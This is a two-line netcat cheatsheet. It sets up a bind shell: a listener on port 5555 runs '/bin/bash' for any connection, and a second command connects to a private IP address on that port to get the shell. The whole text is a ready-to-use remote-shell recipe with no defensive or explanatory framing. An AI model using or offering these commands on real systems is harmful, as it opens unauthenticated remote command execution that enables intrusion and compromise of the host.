Netcat cheatsheet

nc -nvlp 5555 -e /bin/bash # to listen
nc 192.168.10.11 5555 # to run and execute